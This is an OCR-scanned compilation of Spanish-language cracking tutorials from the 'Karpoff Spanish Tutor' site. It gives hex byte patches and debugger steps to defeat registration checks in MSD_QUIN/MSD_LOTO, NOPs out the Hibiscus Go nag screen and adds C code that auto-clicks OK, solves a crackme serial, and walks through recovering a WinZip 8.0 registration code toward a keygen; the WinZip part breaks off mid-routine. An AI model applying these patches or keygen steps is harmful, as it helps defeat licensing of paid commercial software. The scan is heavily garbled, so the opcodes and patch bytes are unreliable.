¿conoceis el hardpatching? ¿no? pues leeros el coc-2000 de mr. nobody ;) 

se trata de parchear la rutina que descomprime el programa para que en el momento que ya exista el byte (o bytes) a 
cambiar sean modificados "al vuelo". 

hay varias maneras de afrontar esto, pero yo elegí la fácil :) 

me espero justo al momento en que se va a producir el salto al programa original, parcheo y devuelvo el control. en 
otras palabras: 


2* modificación 
os acordais de esto: 


:0001.0188 fa cli 

:0001.0189 8ed6 mov ss, si 

:0001.018b 8be7 mov sp, di 

:0001.018d fb sti 

:0001.018e 2eff2f jmp far word ptr cs: [bx] <<<-- te pillé 


en 018e se produce el salto al programa original, lo cambiamos por: 

eb90 jmp 0120 

elegí la dirección 0120 porque si observais la zona con un editor hexadecimal vereis que tiene esto: 
fabrice bellard 

un texto "en claro" que no queremos para nada y que nos deja 15 bytes de maniobra. 

ahora introducimos algo de nuestra cosecha, en 0120 ensamblamos: 


06 push es <<<-- guardamos los registros que vamos a tocar 

57 push di 

2ec43f les di, cs: [bx] <<<-- cargo en es el segmento del programa original (os recuerdo que 
estaba en cs: [bx]), di me da igual 

26c606d3c100 mov byte ptr es: [cl1d3],0 <<< c1d3 es el desplazamiento hasta nuestro byte 
(01) 

5f pop di <<<-- restauramos los registros 

07 pop es 

2eff2f jmp far cs: [bx] <<<-- ahora saltamos al programa original 


pero... un momento... son 16 bytes, nos sobra 1 !!!! 


no pasa nada. 


en vez del último 2eff2f introducimos: 
eb61 jmp 0190 <<<-- 15 bytes. ok! 


y en 0190 encontramos otra cadena: crc error que no creo que nos vaya a salir nunca xddddd 


pues ahí acabamos: 
2eff2f jmp far cs: [bx] <<<-- chin pún 


estas modificaciones se introducen con un editor hexadecimal y cuando ejecutemos el programa tendremos la opción 


resumiendo: 


editamos el msd_quin.exe con un editor hexadecimal. 
buscamos: 740cba9101 

cambiamos por: eb0cba9101 

buscamos: 2e££2£ 

cambiamos por: eb902ef££2£ 

buscamos: fabrice bellara (en ascii, por supuesto) 
cambiamos por: 06572ec43£26c606d43c1005f£07eb61 
grabamos los cambios. 


para el otro programa, el msd_loto.exe, es algo diferente porque el desplazamiento hasta nuestro byte incluye un 
cambio de segmento que hay que tener en cuenta. 


el código queda así: 
018e eb90 jmp 120 


0120 06 push es <<<-—- guardamos los registros 

0121 50 push ax 

0122 2e8b4702 mov ax, cs: [bx+2] <<<-- cargamos en ax el segmento del programa original 
0126 050010 add ax,1000 <<<-— aumentamos el segmento 
0 
0 
0 


129 50 push ax 
130 07 pop es 
131 eb63 jmp 0190 <<<-- no nos cabe más 


0190 26c606271400 mov byte ptr es: [1427],0 <<<-- 1427 es el desplazamiento hasta el 01 que 
cambiamos por 00 

0196 58 pop ax <<<-- restauramos los registros 

0197 07 pop es 

0198 2eff2f Jjmp far cs: [bx] <<<-- ¿hace falta explicarlo? 


resumiendo: 


editamos el msd_loto.exe con un editor hexadecimal. 

buscamos: 740cba9101 

cambiamos por: eb0cba9101 

buscamos: 2eff2f 

cambiamos por: eb9026c60627140058072e££2f 

buscamos: fabrice bellara (en ascii, de nuevo) 

cambiamos por: 06502e8b47020500105007eb63 <<<-- nos sobran 2 bytes 
grabamos los cambios. 


¡¡ ahora sí que sí !! 


si habeis leído el aviso al principio de este documento sabreis que lo leído hasta ahora no es 100% efectivo. 


si volvemos a la zona de código donde modificabamos el valor que tomaba al, os la recuerdo: 


:0001.c1b5 9a87002ald call 1d2a:0087 

:0001.clba 8b867eff mov ax, [bp+ff7e] <<<-== carga crc-1 bueno en ax 
:0001.clbe 3b06dd23 cmp ax, [23dd] <<<-= lo compara con el malo-1 
:0001.c1c2 750e jne cl1d2 <<<-- si no son iguales malo 

:0001.c1c4 8b867cff mov ax, [bp+ff7c] <<<-= carga crc-2 bueno en ax 
:0001.c1c8 3b06df23 cmp ax, [23df] <<<-= lo compara con el malo-2 
:0001.c1lce 7504 jne cl1d2 <<<-- si no son iguales: ya sabes... 
:0001.c1ce b000 mov al, 00 <<<-- el premio 

:0001.c1d0 eb02 jmp cl1d4 

:0001.c1d2 b001 mov al, 01 <<<-= ahora no pasamos por aquí 
:0001.c1d4 a2e1l23 mov byte ptr [23e1l], al 

:0001.c1d7 a0el23 mov al, [23e1] 

:0001.clda 50 push ax 

:0001.cldb 9a00002ald call 1d2a:0000 

:0001.c1e0 08c0 or al , al 

:0001.cle2 752a jne c20e 


os explico: el programa ha calculado con nuestros datos y nuestra clave mala, una especie de crc (para los que no 
sepais lo que es esto, os diré que el crc es un número de 32 bits que "valida" los datos introducidos). 


ese cre debe coincidir con el que haya calculado con nuestros datos y la clave buena. por eso, (como no van a coincidir 
3)) haremos que coincidan sobre la marcha... 


aquí teneis el procedimiento completo: 


ejecutamos el programa msd_quin.exe 

seleccionamos la opción para registrar el programa e introducimos nuestro nombre. nos dará un n? de serie, lo 
aceptamos. metemos una clave cualquiera y antes de aceptar los datos en el s/n vamos a softice con ctrl+d. 
como queremos 'cazar' al programa para poder manipularlo, metemos el siguiente breakpoint: 


bpint 16 if ah== 


esto hará que volvamos a softice cuando se llame a la int 16 y ah valga 0. esta interrupción es la de teclado y con ah=0 
lo que hace es esperar a que se pulse una tecla. 
volvemos al programa con f5. 


pulsamos la 's' para aceptar los datos y estamos en softice (hemos pulsado una tecla). 
borramos el breakpoint, ya no nos hace falta (bc *) 

vamos a mirar la tabla de interrupciones del dos (que está en 0000:0000) con el comando d 0:0 
veremos algo así: 


0000:0000 xx xx xx xx c5 13 x1 xh xx XX XxX xx Cc5 13 xl xh 


lo que ves son punteros completos (segmento:offsset) a las rutinas de servicio de cada una de las interrupciones 
(empezando por la cero). 

si recordais, el programa capturaba la int 01 y la int 03 y es, precisamente, en la rutina de servicio de esas 
interrupciones (que es la misma) donde está el código que chequea el crc. 

las xx son valores que no nos importan. la dirección que buscamos es: xhx1:13c5. el valor del segmento variará de una 
ejecución a otra, pero el offsset no. 

buscamos a partir de ahí el código que hemos visto arriba... 

empieza en xhxl:15a5: 


:xhx1.15a5 9a87002ald call xxxx:0087 
:xhxl1.1l5aa 8b867eff mov ax, [bp+ff7e] 


metemos un breakpoint aquí: 


bpx xhxl.l5aa 


(una observación: anotaros los valores del crc bueno y malo, es posible que os haga falta luego) 


ejecutamos paso a paso con f8. en ax tenemos el crc-1 bueno. 
otro pasito f8 
estamos en: 


:xXhx1.15ae 3b06dd23 cmp ax, [23dd] 


ahora, si hacemos d xhx1:23dd podemos ver el crc-1 malo. 

con el comando e editamos esa zona de memoria y cambiamos el dato malo por el bueno ;) pulsando intro podremos 
ver que softice nos dice, en el salto siguiente, que no jump, es decir, que la comparación ha sido correcta. y seguimos 
con f8... 


:xhx1.15b2 750e jne 15c2 
:xhx1.15b4 8b867cff mov ax, [bp+ff7c] 


paramos. estamos en: 


:xhx1.15b8 3b06df23 cmp ax, [23df] 


volvemos a editar ese dato cambiando el malo de xhx1:23df por el bueno que está en ax y seguimos con f8... 


:xhx1.15bc 7504 jne 15c2 
:xhx1.15be b000 mov al, 00 
:xhx1.15c0 eb02 jmp 15c4 


cuando esteis en el jmp 15c4 podeis pulsar f5 y volver al programa que estará ¡¡¡ registrado !!! 
salid del programa y volver a ejecutarlo para comprobar que seguís registrados. 


el programa ha grabado nuestros datos (nombre, n* de serie, clave y crc) en un fichero que se llama msd_quin.cfg pero 
encriptados. todos menos el crc. 

si al ejecutar de nuevo el programa os apareciera sin registrar, editais este fichero, buscais el crc malo (que habíais 
apuntado antes) y lo cambiais por el bueno (cuidado con el órden de los bytes). grabais y probad ahora... 


este mismo procedimiento lo podeis usar con el msd_loto.exe. por supuesto, las direcciones cambiarán pero la técnica 
es la misma. 


conclusiones: 


- no hace falta parchear el programa. podeis usar el fichero msd_quin.cfg de alguien registrado. 

- espero que nadie se haya perdido entre tanto byte :) 

- el 'parche' explicado en la sección anterior lo que hacía era saltarse la comprobación del crc a lo bestia. pero, por lo 
visto, no era sufciente. el crc tiene que ser el correcto, si no algunas opciones fallan. 

- un detalle: si se utiliza la técnica del hardpatching y se aplica el parche en el salto final de la rutina de descompresión, 
se puede usar toda la zona de código de dicha rutina para meter nuestros 'arreglos', ya que ese código no se volverá a 
usar. 

- no confundais el crc que chequea la rutina de descompresión del programa con el crc que se calcula a partir de 
nuestros datos de registro. 

- habreis observado que las direcciones que aparecen en los listados de código no coinciden con las que yo os comento 
luego, pero es porque una dirección de memoria se puede escribir con muchas combinaciones de segmento:offsset y 
cada desensamblador elige la que cree más conveniente. pero siempre hablamos de la misma dirección física. 


bueno, y con esto y un bizcocho... 


y SO ; : 1 
recordad: si os haceis millonarios acordaros del pobre crick $ ( 


un saludo. 


p.d.: no soy partidario de crear parcheadores expecíficos, pero aquí teneis la información. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 
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Programa para la edición de partidas de Go 


File InsPEctor, TRW2000, Hex Editor 


hibiscus go contiene todas las funciones básicas que pueden esperarse de un buen editor de partidas. el 


programa puede leer y grabar en los dos formatos de juegos más comunes, el formato sgf (smart go format) y 
el llamado formato standard. 


las funciones básicas de hibiscus go son: 


e ingreso de partidas (incluyendo variantes, comentarios, diagramas especiales, etc.) 
e reedición de juegos (con métodos sencillos para avanzar y retroceder) 
e impresión de partidas (incluyendo el formato rtf) 


en principio analizamos el comportamiento del programa para poder conocer las limitaciones que nos impone. 


ni bien corremos el programa nos aparece la siguiente pantalla 


a 


ahora adelantamos la fecha del sistema para que el programa caduque, digamos 70 días. ejecutamos nuevamente el 
programa y nos aparecerá la misma nag screen recordándonos que pasaron 71 días de nuestro período de prueba, 
aunque nos deja contiunuar con su utilización. probamos atrasar el reloj al dia de la instalación y la nag nos recordará 
que han pasado 1 día de la evaluación. evidentemente el autor ha decidido recordarnos solamente, al inicio del 
programa, el tiempo de utilización del mismo sin desarrollar otro tipo de protección por lo que el ataque se basará 


solamente en la eliminación de la esta molesta pantalla que nos obliga a pulsar el botón de ok cada vez que corremos la 
aplicación. 


a partir de ahora podríamos cargar el softice para intentar establecer un punto de ruptura (bpx) en alguna de las 
funciones típicas como messageboxa, createdialogindirectparama, showwindow para luego comprobar que el nag es 
dialogboxparama o realizar un procedimiento mas sencillo mediante el uso de trw2000. 


cargamos el debugger en memoria y luego ejecutamos hibiscus hasta que aparezca la pantalla de bienvenida, luego 
pulsamos ctrl-n para llamar el trw2000 en modo ring 3 (ver la ayuda del programa), tipeamos el comando pmodule y 
damos enter, el debugger nos devolverá automáticamente al nag screen. ahora pulsamos el botón ok y saltará 
nuevamente trw2000 justo en el módulo que llamó a la función, es decir el programa hibiscus. de esta forma nos 
evitamos tener que pulsar repetidamente f12 (como en el caso del softice) hasta alcanzar el mismo punto. podemos ver 
una descripción y ejemplo del poderoso comando pmodule es la sección "test" de la ayuda de trw2000. 


ahora estaremos en la siguiente sección de código: 


:0046ef5e 51 push ecx 

:0046ef5f f£7010 push [eax+10] 

:0046ef62 8b00 mov eax, dword ptr [eax] 
:0046ef64 8b506c mov edx, dword ptr [eax+6c] 
:0046ef67 ££7208 push [edx+08] 


* reference to: user32.dialogboxparama, ord:0000h 


| 

:0046efóa e8bea60200 call 0O049962d 
:0046ef6f 5d pop ebp <==== aqui 
:0046ef70 c3 ret 


comprobamos que realmente es esta la llamada correcta situando un breakpoint en 0046eefóa y corremos nuevamente 
el programa. presionamos f12 y nuestra pantalla aparecerá de inmediato. a partir de aquí reemplazamos eSbea60200 
por 9090909090 (nops) con el propósito de anular la llamada al nag screen para darnos cuenta inmediatamente que 
windows produce un general protection fault (gpf). ¿qué ha pasado?. simple, antes de dicha llamada el puntero de stack 
(esp) contiene un valor distinto al que tiene después que retorna lo que hace que el programa deje de funcionar. para 
solucionar esto deberemos conocer los valores de esp antes y después de la llamada en 0046ef6f. 


con el punto de ruptura ya situado en la línea correspondiente al llamado de a dialogboxparama (en 0046eef6a) 
corremos nuevamente el programa y tipeamos el comando ? esp para averiguar su valor lo que nos devuelve 70fb1c, 
luego pulsamos f10 para que se ejecute la función y consultamos nuevamente el valor de esp que ahora sera 70fb30. la 
diferencia es da 14 (hexadecimal) por lo que deberemos reemplazar: 


e8bea60200 call 0049962d 


que tiene 5 bytes de longitud con: 


:0046ef6a 830414 add esp, 14 ¡para mantener el valor final del stack 
:0046ef6d 44 inc esp ¡incrementa esp 
:0046ef6e 4c dec esp ¡disminuye esp para anular el anterior 


ahora sólo nos queda utilizar cualquier editor hexadecimnal (por ejemplo hiew) para realizar las correcciones antes mencionadas 
y tendremos el programa funcionando sin su pantalla de bienvenida. 


en el supuesto caso de que no desearamos "retocar" el ejecutable todavía nos queda una opción más a través de la creación de un 
programa que simule la pulsación del botón ok tal cual se explica en el excelente turorial "simulating user input to eliminate nag 
screens" por bb. el código fuente en c para realizar esto es: 


ttinclude 
tHinclude 
ttinclude 
char *programa="hibiscus.exe"; 
hwnd mewhwnd,clickithwnd; 


bool callback enummain(hwnd myhwnd, Iparam lparam) 
( 
printf("hwnd principal: %04x11",myhwnd); 
mewhwnd=myhwnd; 
return(false); 


) 


bool callback enumchild(hwnd myhwnd, Iparam lparam) 


( 
char class[200],text[200]; 


getclassname(myhwnd,class,sizeof(class)); 
getwindowtext(myhwnd,text,sizeof(text)); 
1f (Istremp(class,"button") 48 !stremp(text,"ok")) [ 
clickithwnd=myhwnd; 
return(false); 
) 


return(true); 


) 


main(int argc,char **argv) 
( 
startupinfo startinfo; 
process_information procinfo; 


getstartupinfo(Sstartinfo); 
1f ( createprocess(null,programa,null,null,false,normal_priority_class,null, 
null, 8startinfo,ézprocinfo) ==0 ) ( 
fprintf(stderr,"no se pudo crear el proceso"); 
exit(-1); 
) 


waitforinputidle(procinfo.hprocess,2000); 
enumthreadwindows(procinfo.dwthreadid,$enummain,0); 
waitforinputidle(procinfo.hprocess,500); 
enumchildwindows(mewhwnd,éenumchild,0); 
postmessage(clickithwnd,bm_click,0,0); 
) 


este manual ha sido creado sólo con fines educativos y si usted va utilizar este programa por favor pague al autor por el uso del 
mismo. 


sujeto tacito 


stacito hotmail.com 
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Programa: Crackme (id:12) by tC... 


PROTECCION: Serial. 

Objetivo: Encontrar el serial. 

Descripcion: Pues eso. 

Dificultad: Facililla 

DOWNLOAD : http: //welcome.to/karpoff 

Herramientas: Softice, Dede 2.43 

CRACKER: El Pollo FECHA: 29/11/2000 


introduccion 


este es mi primer tutorial. espero que con mis todavia pobres conocimientos y experiencia os ayude en algo a la otra de 
obtener un serial valido para otra aplicacion. 


al atake 


empezamos analizando el fichero con el gettyp o similiares. 


= [c:Xcm_idl2.exe] 
dos executable file - 371712 bytes 


portable executable (starting at 256 for 371456 bytes) 
compiler: borland delphi 4 


calculated entrypoint: 284984 / 00045938h (rva: 00046538h) 

required cpu type: 80386 

requires any version of win32 

flags: 
file is executable 
line numbers stripped from file 
local symbols stripped from file 
32 bit word machine 

linker version: 2.25 

objects (object align = 00001000h): 
name virt size rva phys size phys ofs 
code 00045580h 00001000h 00045600h 00000400h 
data 00000e48h 00047000Kh 00001000h 00045a00h 
bss 000008el1h 00048000hKh 00000000h 00046a00h 
«¡data o0001f08gh 00049000hKh 00002000h 00046a00h 
.tls o0000010h 0004b000hKh 00000000h 00048a00h 
.rdata o0000018h 0004co00h 00000200h 00048a00h 


.reloc 00004ed0h 0004d000h 00005000h 00048c00h 
¿ESC 0000d4000h 00052000h 0000d000h 0004dc00h 


- files identified: 1 of 1 (100.005) 
- total time: 0.0 ms (0.0 ms/file) 


vemos que no esta empaketado porque nos indica que esta compilado con borland delphi 4 (normalmente los que estan 
empaketados no muestran el compilador usado). tampoco esta empaketado porque las virual sizes se corresponden con 
las physical sizes mas el physical offset. 


bueno, a continuacion por estar compilado en delphi lo procesamos con el dede y vemos que solo hay un procedure 
llamado 'unit 1' con 3 events: register1click, exit2click y aboutl click. nos interesa el 1” de los eventos claro esta. 
desensamblamos este fragmento de codigo y obtenemos: 


KKXXXX try 


00446228 64ff30 push dword ptr fs: [l[eax] 
0044622b 648920 mov fs: [eax], esp 
0044622e 8d55fc lea edx, [ebp-$04] 

* reference to control editl : n.a. 

00446231 8b86c4020000 mov eax, [esi+$02c4] 


=> a continuacion lee nuestro serial. 
* reference to: controls.tcontrol.gettext () 


00446237 e814a7fdff call 00423950 
0044623c 8b45fc mov eax, lebp-$04] 


=> calcula su longitud. 
* reference to: system. .dynarraylength () 
| or: system. .lstrlen/() 


0044623f e8b4d8fbftf Call 00403af8 

00446244 a3d4884400 mov dword ptr [$4488d4], eax 

00446249 833dd488440000 cmp dword ptr [$4488d4], +$00 

00446250 0f84ac000000 Az 00446302 <-— si la longitud es O ciao 
00446256 33db xor ebx, ebx 

00446258 43 inc ebx 

00446259 8a55fce lea edx, [ebp-$04] 

* reference to control editl : n.a. 

0044625c 8b86c4020000 mov eax, [esi+$02c4] 


=> y no te lo pierdas lee nuestre nuestro serial un par de veces mas. ¿7? 
* reference to: controls.tcontrol.gettext () 


00446262 e8e9d6fdff Call 00423950 

00446267 8b45fc mov eax, lebp-$04] 

0044626a 0fb64418ff movVZzX eax, byte ptr [eax+tebx-$01] 
0044626f 89049474884400 mov [$448874+ebx*4], eax 
00446276 8a55fce lea edx, [ebp-$04] 

* reference to control editl : n.a. 


00446279 8b86c4020000 mov eax, [esi+502c4] 


* reference to: controls.tcontrol.gettext () 


0044627f e8ccd6fdff call 00423950 
00446284 8b45fc mov eax, lebp-$04] 


* reference to: system. .dynarraylength () 
| or: system. .lstrlen/() 


00446287 e86cd8fbff Call 00403af8 
0044628c 3bd8 cmp ebx, eax 
0044628e 7508 jnz 00446258 


=> alto aqui que ha sonado un tiro. esta funcion que no esta especificada como 
nativa de delphi es muy sospechosa, no crees? y si no los crees te lo digo yo. 
mas tarde la comentaré. 

00446290 e85bfftffff Call 004461f0 

00446295 b8d48884400 mov eax, $004488d8 


* reference to: system. .lstrclr(system.ansistring) 


0044629a e8ddd5fbff Call 0040387c 

0044629f bf12000000 mov edi, $00000012 
004462a4 bbc0884400 mov ebx, $004488c0 
004462a9 8d45f8 lea eax, l[ebp-$08] 
004462ac 8a13 mov dl, byte ptr [ebx] 


=> lleva a cabo todo un proceso que podras comprobar tu mismo que en definitiva 
lo que hace es invertir nuestro serial a base de ir concatenando, pero no el 
serial introducido por el usuario. 

* reference to: system. .lstrfromchar (system.ansistring) 

or: system. .1lstrfromwchar (system.ansistring) 

or: system. .wstrfromchar (system.widestring) 

or: system. .wstrfromwchar (system.widestring) 


004462ae e86dd7fbff Call 00403a20 

004462b3 8b55f8 mov edx, [ebp-$08] 
004462b6 b8d8884400 mov eax, $004488d8 
004462bb 8b0dd8884400 mov ecx, [$4488d8] 


* reference to: system. .lstrcat3() 


004462c1 e8Ted8fbftf Call 00403b44 

004462c6 43 inc ebx 

004462c7 4f dec edi 

00446208 75df jnz 004462a9 

004462ca ald8884400 mov eax, dword ptr [$4488d8] 
* possible string reference to: ':udé”“¿p)idiáuéiloyp+' 

004462cf ba38634400 mov edx, $00446338 


=> momento culminante. compara dos Cadenas de caracteres. cuales seran? 
* reference to: system. .lstrcmp() 

004462d4 e82fda9fbff Call 00403c08 

004462d9 7527 jnz 00446302 


=> si la comparacion es positiva 'yeah you did it!!' o lo que es lo mismo guay. 


* reference to control yeahyoudiditl : n.a. 
004462db 8b86dc020000 mov eax, lesi+$02dc] 
004462el b201 mov dl, $01 


ahora nuestra mision es rapidamente cargar nuestro programa con el softice y 
ponerle un breakpoint en 004462d4 para ver que Cadenas compara y podremos ver 
nuestra Cadena comparada con la buena que nos dara la victoria. si traceas la 
funcion de comparacion entrando con f8 vemos que las 2 Cadenas que se comparan 
estan en eax y en edx que han sido metidos en la pila antes de la llamada a la 
funcion. pues miramos el contenido en memoria que apuntan estos registros y 
vemos Cadenas no visibles o entendibles al ojo humano. es momento de pensar que 
nuestra Cadena no esta ahi siendo comparada, pero ya os adelante que habia una 
funcion que lo que hace es codificar nuestra cadena. bien pues esta funcion 
hace lo siguiente: 


en eax esta nuestra Cadena con el serial introducido y en edx la longitud de 
esta. 


004461f0 8b15d4884400 mov edx, [$4488d4] 
004461f6 85d2 test edx, edx 
004461f8 7e12 jle 0044620c 
004461fa b878884400 mov eax, $00448878 


hace la xor es decir la or exclusiva del primer elemento de la cadena y 3. una 
xor para el que no lo sepa es cambiar devolver un 1 donde los bits comparados 
son distintos y 0 en otro caso, por ejemplo: 


5 en decimal -> 101 en binario 
3 en decimal -> 011 en binario 
6 en decimal -> 110 en binario 
004461ff 833003 xor dword ptr [eax], +$03 


las 2 siguientes instrucciones son equivalentes a multiplicar por 2 el 
elemento. 

00446202 8b08 mov ecx, [eax] 

00446204 0108 add [eax], ecx 


se posicion en el siguiente elemento. 
00446206 83c004 add eax, +$04 


realiza un bucle hasta que haya procesado todos los elementos de nuestro 
serial. 

00446209 la dec edx 

0044620a 75f£3 jnz 004461ff 


llama a la segunda parte de la codificacion de la cadena. | 
0044620c eBafffffff Call 004461c0 
00446211 ES ret 


-> segunda parte de la cadena 


004461c0 23 push ebx 

004461c1 56 push esi 

004461c2 8b0dd4884400 mov ecx, [$4488d4] <- la longitud 
004461c8 85c9 test ecx, ecx 

004461ca 7e20 jle 004461lec 


004461cc be01000000 mov esi, $00000001 


004461d1 b878884400 mov eax, $00448878 
004461d6 baco0884400 mov edx, $004488c0 
004461db 8b18 mov ebx, [eax] 


le suma 8 a un elemento. 
004461dd 83c308 add ebx, +$08 


y le resta el contador del bucle que realiza a nuestra Cadena y lo va guardando 
en otra posicion de memoria apuntada por edx. 


004461e0 2bde sub ebx, esi 
004461e2 88la mov [edx1, bl 
004461e4 46 inc esi 
004461e5 42 inc edx 
004461e6 83c004 add eax, +$04 
004461e9 49 dec ecx 
004461lea 7T5ef jnz 004461db 
004461lec 5e pop esi 
004461led 5b pop ebx 
004461lee c3 ret 


al final tenemos nuestra cadena codificada de la siguiente manera: al valor ascii de cada caracter le aplica una xor con 
3, lo multiplica por 2, le suma 8 y le resta el contador del bucle. 


volvemos a la funcion que realiza la comparacion, esa en la que no se entendia nada, y vemos ahora con mejores ojos 
que nuestra cadena codificada se compara con: 3a d9 c4 c9 ba bf de 7d 44 cf e2 d9 ea 49 d2 dd de 8f. la longitud de 
esta cadena de de 18 caracteres de ahi el nombre del crackme (id 12), ya que 12 en hexadecimal es 18 en decimal. 


en resumen, tenemos que conseguir que la cadena que introduzcamos sea coincidente despues de haber sido codificada 
e invertida en comparacion con la buena. he aqui la ingenieria inversa: 

nuestro 1” caracter ha de ser 8f que aplicandole la codificacion, es decir, sumandole el contador que es 1, restando 8, 
dividiendolo por 2 y haciendole la xor con 3 nos dara el 1? caracter ha introducir que sera 47 en hexadecimal o 71 en 
decimal que equivale a 'g'. para comprobarlo manten la tecla alt presiona y teclea el numero en el teclado decimal 
obtienes el caracter. 


si repites el proceso para toda la cadena a comparar obtendras el serial valido: 


serial: good work cracker! 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: [WinZip0 ver. 8.0 (3105) 


PROTECCION: Name/Registrationt. 
Programa para comprimir y descomprimir archivos en formato ZIP. 
Obtener Registration (Número Serie) válido para registrarnos y 
OBJETIVO: Ñ Ñ 
Crear un Generador de Claves en Visual Basic. 
Dificultad: Novato, Facililla, Media, ETC. 
DOWNLOAD: http: //www.winzip.com 


Herramientas: — [Nunega SoftlIce 4.05, W32Dasm v8.93, Visual Basic 6 


introduccion 


herramienta para comprimir y descomprimir archivos en formato zip. de la empresa winzip computing, inc. copyright 
O 1991-2000. 


antes de comenzar el atake, hay que tener claro, las herramientas que vamos a emplear, en esta "victima" 
emplearemos el maravilloso debugger de numega - softice ver. 4.05, para obtener el ansiado "registration+” o número 
de serie. 


pues, nada vamos al aaaaaattttttaaaacacakkkkkkkkeeeeee 


arrancamos el winzip 8.0 nos aparece la tipica pantalla "thank you for trying winzip! this is a fully functional unregistered 
version for evaluation only ... blah, blah, blah" 


THE ARCHIVE UTILITY FOR WINDOWS 


THANK YOU FOR TRYING WINZIP! 
This 15. a fully functional unregistered version for evaluation use only. 
The registered version does not display this notice. 


You can order the registered version online, by phone. or by mail. 


Immediate online delivery is available from www. winzip. com. 
View Evaluation License Enter Registration Code... 


| understand that | may use WinZip only for evaluation 
purposes, subject to the terms of the Evaluation License, and 
that any other use requires payment of the registration fee. 


pulsamos el botón [enter registration code] nos aparecera una pantalla para introducir los siguientes datos : 


name: 
registration +: 


regresamos al softice (ctrl+d) y ponemos un bp (breakpoint) getdlgitemtexta 'bpx getdlgitemtexta' regresamos a nuestra 
"victima" en este caso el winzip pulsando (ctrl+d), introducimos los datos a registrar: 


name: +erCser'2000 [for the new millennium] 
registration +: 99666699 


Register WinZip 


lf you paid the WinZip registration fee: 


IEyou paid the WinZip registration fee and received a tegistration number from WinZip 
Computing or an authorized reseller, please enter your name and registration number here 
EXBETLY as they appear in the instructions, or click "Help" for additional information. 


If you have not yet paid the WinZip registration fee: 


If you downloaded an evaluation version of WinZip, or if pou received this version oPWirnZip 
ona disk or CD, with a book, or with other hardware or software, and you have not paid the 


WinZip registration fee. you are licensed to use WinZip for evaluation purposes only. Click 
"Continue Unreaistered", or click “Help” for additional information. 


Name: +Ertdser2000 [OR (HE nEw miLLENNIUM] 
Registration + ]39666694 


Cancel Continue Unregistered | Help 


pulsamos el botón [ok] y pantallazo dentro del softice, pulsamos [£12] y aparecemos en el winzip32!.text+6f6d 
¡vamos, a la caza del registration number! 


:00407f6d 111528744700 call [user!getdlgitemtexta] 


:00407f73 


57 


push edi 


<-- name 'd edi' 


pulsamos 'g' para continuar la ejecución (seguimos la pista del registration ++) pulsamos [f12] 


:0040708f 
:00407095 
:00407096 
:0040709a 
:0040709b 
:0040709c 
:004070a1 
:004070aa 
:004070ac 
:004070b3 
:004070b5 
:004070ba 


dentro de la rútina iremos traceando [£10] observando las operaciones que realiza 


:00407b4b 
:00407b4c 
:00407b4e 
:00407b54 
:00407b55 
:00407b56 
:00407b58 
:00407b5f 
:00407b60 
:00407b66 
:00407b69 
:00407b6a 
:00407b6f 


:00407c09 
:00407c0e 
:00407c14 
:00407c15 
:00407c16 
:00407c1b 
:00407c1c 
:00407c21 
:00407c22 
:00407c28 
:00407c29 
:00407c2a 


£f1528744700 
56 
esff780300 
59 

56 
e822790300 


803d78cd480000 


7459 


803da4cd480000 


7459 
eS1bfaftff 
85c0 


55 

Sbec 

S1ec08020000 

53 

56 

3316 

803d78cd48000 
57 

0185492000000 

8d45ec 

50 

6868144600 

es4f9cffff 


e9b3000000 
Sd85cOfeftfff 
50 

57 
e8a9000000 
59 
bes85cOfeffff 
56 

50 
eSd1fc0400 
f7d8 

1bc0 


call [user!getdlgitemtexta] 
push esi 

call 00429699 

pop ecx 

push esi 

call 004296c2 

cmp byte ptr [0048cd78], 00 
jz 004080b2 

cmp byte ptr [0048cda4], 00 
jz 004080b2 

call 00407b4b 


test eax, eax 


push ebp 

mov ebp, esp 

sub esp, 00000208 
push ebx 

push esi 

xor esi, esi 

cmp byte ptr [00474928], 00 
push edi 

jz 00407c07 

lea eax, [ebp-14] 
push eax 

push 0046f460 
call 00401703 


jmp 00407cc1 

lea eax, [ebp-0140] 
push eax 

push edi 

call 00407cc6 

pop ecx 

lea eax, [ebp-0140] 
push esi 

push eax 

call 00457900 

neg eax 

sbb eax, eax 


<-- registration+* 'd esi' 


<-- call hmmmm [f8] 


<-- call n* válido 


si observamos la pantalla de los registros, observaremos los siguientes valores: 


eax=0072f4b8 ebx=00000001 ecx=0072f4b8 edx=0072f4c0 esi=0047d958 
edi=0047d928 ebp=0072f5f8 esp=0072f3e4 eip=00407c28 
es=017f ds=0187 ss=0187 es=0187 fs=2b7f gs=0000 


visualizando la pantalla de datos observaremos que nos aparece un número extraño, este número si lo introducimos nos 
registrara el programa ;)) 


0187:0079£258 00 00 00 00 00 00 00 00-00 00 000000000000 inmccncnncnnenninninoonoonoononnooaconosnos 
0187:0079£268 44 35 45 39 43 33 45 39-00 17 00 00 00 00 2f 0f ETS A AA 
0187:0079£278 0b 00 0d 00 54 05 87 01-00 00 00 00 00 00 97 16 A 


al llamar a la call 00407c16 retorna un n” mágico a la pila y lo pasa como argumento junto con nuestro número a la call 
00407c28 nos devuelve al registro eax=00000001 esto significa que la comparación es ''errónea' = los 2 números no son 
iguales. 


borramos todos los bpx con bc * y ponemos un bp 'bpx 00407c16' pulsamos 'g' y continuamos con la ejecucion 


apareciendonos el mensaje de error ''incomplete or incorrect information''pulsamos el botón [aceptar] del mensaje de 
error y "voilá'' estamos en la call 00407c16 pulsamos [f8] para ir trazeandola paso a paso, y vemos lo siguiente: 


:00407cc6 55 push ebp 

:00407cc7 Sbec mov ebp, esp 

:00407cc9 51 push ecx 

:00407cca 8b4d08 mov ecx, dword ptr [ebp+08] ¡name introducido 

:00407ccd 83651c00 and dword ptr [ebp-04], 00 

:00407cd1 53 push ebx 

:00407cd2 56 push esi 

:00407cd3 8al1 mov dl, [ecx] ¡lee 1” caracter 

:00407cd5 57 push edi ¡guardalo en edi 

:00407cd6 33c0 Xor eax, eax ¡eax =0 

:00407cd8 Sbfl mov esi, ecx ¿copia puntero del name 

:00407cda 331ff xor edi, edi sedi =0 

o $ cálcula la 2” parte del registration+ válido y lo deja en [ebp-04] - --------- 

:00407cde* 84d2 test dl, dl stestea caracter null 

:00407cde 7413 jz 00407cf3 ¿si es null exit 

:00407ce0 660fb6d2 movzx dx, dl ¡extiende caracter a dx 

:00407ce4 Sbdf mov ebx, edi ¿copia contador 

:00407ce6  Ofafda imul ebx, edx ups condor por 
caracter actual 

